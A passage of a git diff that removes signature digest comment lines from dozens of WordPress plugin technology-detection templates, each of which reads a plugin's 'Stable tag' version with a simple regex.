4a0a00473045022100f90b5c64f5e2ba5400e345f2353252f8e98caac3c2cb1efce0a55e06d9cf430702204c18646406c16f03608d01b9371e1081844c8014a696f3323d212b6409506c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 3366903de9..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a6f0c7df79a258c742fa868a964e4d46b86919a8f39c7cf64ca675cd14e819e0220344e033ed04d94404ef0949f46cd8fa71098cf8fdcbb53d9e9816fba491214bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 78d761be00..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220330d517911db2bc4a00124e36e514a002d8b4b0b637cc8d21b1784fe0e6ed24e0221009cdc038f99a2261a42cb4439b895391b8fa3425a9fc424a8d7629e81d56166c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index e8975d69e2..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2b34731b9796a79058fc0d2e1d69d4f513380815ab86f9e45c880f0bc31a3550220057119ebd81bf898e2e82519d16dd291266a88f231e4b8292c8066da7ce04de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index d043e89fc2..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a621799f480dc9d982f6aef8eeeccefeda6dea8b96d7fdebb8222431fe45b8ef022100896a5f6c53544a89128a7b1b67692a28789ab443f1b110407b8722a6c89fb8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 357efc2f1f..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e739a62b48fbd873d766243f85310b8e9c048817c16e45cb6e291f2facbb41302202120965ec8596a5d028c5a500e2b77d45e5946a3cd55dcc75ededef61a616b70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 097410bc96..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045ef2ea384c7b3f098ed5fcda2db643c76e4a4b563cb667ab6000511dfd1bf6b022018451c7b800c7bfac41fe3f50ff82f70b557c7fc0637e26902423c7322ff00c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index ed64942e0c..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec5fc96a9c62987b9914f1748ba08f441cd5c72a2d13b80e11d3230800e43ff90221009554c7e89e0f62d841c998c0313bf3bc79dfabee85db79f39037d5c32fa5d14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index cc6d0f3b93..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aeedc10cdba61c2286e89cb8182a37c95ee8157a342aa873c1ce5005346446460220453a05274572ba573b4691cab5ea826c0c3d202f56f0a6ebeb7e83df09927744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 7975142a74..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080833f0a6f6965bf701a9f8f85c42f13aced2edfa3c92f35b7bf9b2949f30c92022010f4ca3a59b6d406300c386db8a6df73c29dbe232100869a5813747db8f85ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 207bf964b4..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1d2f7f6be6fddf20850b4703b6ab5b8d957c3e74b071534c1bc6ad7fe41436502202a71f99ce82762f27add68abbe7a23d4240623238e94b985bfca1ee61f0d6da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index c79da31bb6..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205c5109cf3bacc2b8cc218a17cfe92ee3fe4d72de8ac73e91373f19d9b8c3d31b0220238301247108e18a2cba0ed47c36b28c5c8faecfd5240ec31685b0d90441bd88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index cb2878e9ad..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e53d59041d41a70647f545a55fcfdff1cdbc2a49aadf9b5f659ae93371918d50220098775c59e3b87e6be78842156c7241c18d7a0b357642133f15f77be8d7cab55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 9a4f30a2f4..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1ddd14f6387bf2982f4bce8fbc3a4947b77511c0efeab680f998557dd7fe530022004d54454b173b3799de58a0775b79229217011002c27b5e37f88e9c4153b93b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index cd27b76ea3..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220199adf3dca06dbafdf15f58c0e059c580c690a47298d88590d067df01557fe3e022100bb1480a6c06a9560a4d844220066a6513f5332c08eff31695cd0d53e308d17f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 9e93023871..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8bf8d7d16e101d6da570588e7d4bda90f3928c5b700764a4e8ac07ca18ae480022100e11a1d19fccc35366ea3bd589f834d04b6ec9ca887e3418c8e53a82ee433cd40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 5273620995..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200cfe429a4d25d4c22eb6a61b7b52d17ebe6c552dd47c64b762c5794e6f97adee0220686ef471e2c5d52316f84fbd116e2399d3593896d23ba69b8dbb1a512672f4f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index d4ca5b8686..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c01646b0575cf57b2cb4501545ed40118eaacea85bcd059deb9ca88cab465cbd022100ef8a8c51ab8767a3f508b14e58f2398285c81a59f4ce9db52471230d7580d406:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 1698aa1627..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022032b67759d95061453c79b65aae1ce69db442ef30e8c3862cefc1fbe2330af108022100e6254d64680e63f7d2d8a7f7af20e6ef835244a4b1c44b2fbb88d6bdd4705a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 2f33e43805..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fbbca3ca6c09d499a91c098066a03d7f924acb85fe36cc16576ac9e094ac6a2f022100933b104bbfea964358b544b4d3f7d430eb5a36fac2ebe8b092fa17a7c9e469d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 6966401293..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a4a26539eb02e22d38401adebe67d953400c3c14e580580d4a8fc3d754ecfcd022100c25d7740d7c685f9e94fbdca6ff1d44d10c350b9f1c81bed889328c190d86f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index d7a9148cad..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c99ce9c2661bdd54d56574864437371d73ab0e3428fa01c6c97b59f4967c5571022100adefcdc30c2ea9fc724bd55cd401ac2cac54da31c66a6220d55be63f65540162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 7f1a05d4fe..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203319cae360469622929a306469361144fb7009f1ec8dd83b0f2c4379d37f28d2022100aa505c450bde75b22e385ee558457c15e2a6b76f9411e9c1c9fab8f7ab057081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c5b8e120d..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a496713fca262e4114aa39459f8d553dde5950316e7bba69b3cc4c620faadfdf0220206948c12de5016492989f912f1c7bdda92ac1c382d195d4ef4b71278bb4062d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 01f0558f86..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acb053fe0a5bfb3aabcd385031058e4b026062054f7be3a2738de05c99fd8cc702210083c1906b99db11b71208f89de95811f00e1f5605d11dfaed947b338b72408fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index aedf03c630..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220706cafe45eb4aafb06ccd9303881494059a06ba5475496cca5464505fd1f57f5022003579197521eaf3e883b42b82cbc71de9317d459db82a1e999fee877229937a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index a4d81b8fc5..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100928cc763b02f807158b7e3774309ded6bc41cee14f18e816d5aa7971d72303aa0221008efd26b1804b4e3a554830db5f5258ac20ee5a7fca4f699de709c9d06eb6e76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index d2d917a53c..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220362d55eacd4e0529ccbcd5c2cc6409c896fbcbe11098945c7a7effa5942ece34022100ea08980ed018f320b620f6a38a225db823f964221f68d98345406d6212596a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 7a4b8307d7..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e2103855103fa095a6a057a621f43f85536b8711147339f17b8a8166d6b704b0220173a7844f0a3b8f36a51940aec38b4f7f9db0e8cdc517786bdba50a446442840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index ba53209246..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb5b9bf4cddc55618adc2637ef5bab88dd83ed99f9c241cf947df4baf73ff4de02210088084bd1099c88dc0d1ecdae1b879ee7ddc22cd559a39ed6a0b6592e487f11a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 3ea8b64b2c..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e160202a9722fcc926977cde9aec31160b512981d9104f157c15844394c211b5022036c9664ae6bb1f496f8f19744ff9a3f22641aaac7a9f24f1527818e0cf00f74e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index e337b0035f..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f30a511bb4cb04fc0d2904238befde7f653d65db079c31038586a084059953b3022001424a080669776cd9b03feddfc4d1d2029642a01b61d97b5845e2d01359ba50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 799aad653f..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a2b8804e1cd5e7e40a434cfad3563d07e88e23891b307e90565da0c8ab4557a02207054488675272bd7d60e9dcab6bdf45610e6d1bc5955611d4ef802ec81c4ec3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 9f6c10f69c..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220756ba6b0e0f30dbeb081bf7c46eeeb63ebb1c2c315075eed2f5ee63b08d0b072022100f50d24aeb7f09b5ac704a3f9ceded626e91d40be83d746eff7a486858c08de8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 4b9385d4ad..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011f85a18447ff448d109a0433febb9f8727ded57766fd8ba80d31b6058e1a350022008759eafea04b10896bb4355555670f1d2272cb38da91efb2259d3bd2eb45eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 19d317ffa8..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a23998cc90decc40981cb31cc864550865e6251a2c3b85f039db19961500120022028dbcd170f15a83a85d19ee42fd87da5169a495f2ea5b70464299de56929d13e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 7c2bc7fc7c..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce7607354ffbd0c6edf64b9f09bc3b5e170bc5eba7d64a2531dae81c8435c844022100b50b2eddded8c1ece094c98530e583ad4fcfdf4c80924f376740919d5a568741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 65abd44a36..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1b42628d60cdb8d761ec22ebc34e1266b2e288637d1408d355608942596727a022016b994ba1d89d06f67aca3d67448816f5295c5e1388555e74a9fdb9ce8e9ddd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 9797b563d8..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f2710add8dc7ba07d9bcd4054db30f6800216725d5ce413c6e89449a0b11e6b022100d362cb55b6719c7183710d999331ce302beacbe382becc20a25a761dc1877964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 14d9002152..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ee1025c95b5a716ddd952fb681405b4bb79f4c49062e84a80a29a005a53fb8f02200807465c86930997a8f42de5696742add674c864bad2814690688a82d8390c3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 75764cf3ef..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100950a254061a9f4333ed1d6b4cde994fe094b918a43e796a4b44236cbdb15ff01022100dfcae8f7a976cd502d31d6119783f695aac6e004a679c221a7d174bfe8fbfa9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index a98c1f3b0f..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa07b543553bcbf298cd20833dac22d3309ade0e5f582cf3ca443de8bc4f3499022100c6aec46e5e4390780bf50b576646b05da18121407bd138878a232f448928bdfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b178ae71ac..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da919fa1a860ce5e7293971adad434fbe43caad3ed1ee5b3f7de49780108aefc022100b56e41b80436f0e0209f54fc1d249904476aaa362c248ab60607d1fa0a38a51e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 1433c032d3..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003e7bb755e61bf228a1a866d8c4c9478623c53f93511aa7cd74addd85104e83b02206438794ba370a44f90e0470f0bf889b02dc0156c3f95cc5403f6008e1aec4fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 841a5de932..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009aeed5e82d2edca95813538ef1e6d2dfb4484d45f0e97075dfcbc7aedff8cac2022100a918d568502a8403d0c22f8d995e578940e42d74a396924de9e6f60737729e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 5647844abf..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220118669fd621d8bc6045fd32d2c5dd90a4d0c427fa19e3db2c4686bd3d8c3d149022005f7269c1de6320915f40dd85b4f9f3e87c9125b62d3b473b53b8092c91992db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 3e2b964e09..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbed62875d3692e3f3e9705bb48c8eab5bf6f28ba462607a07365e2a4050048c022100aa2d0905eabc20d45736a849fbcdd3e9e54f38f729901b6bf8fb5bd97ef4a19c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 1f82539cb2..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 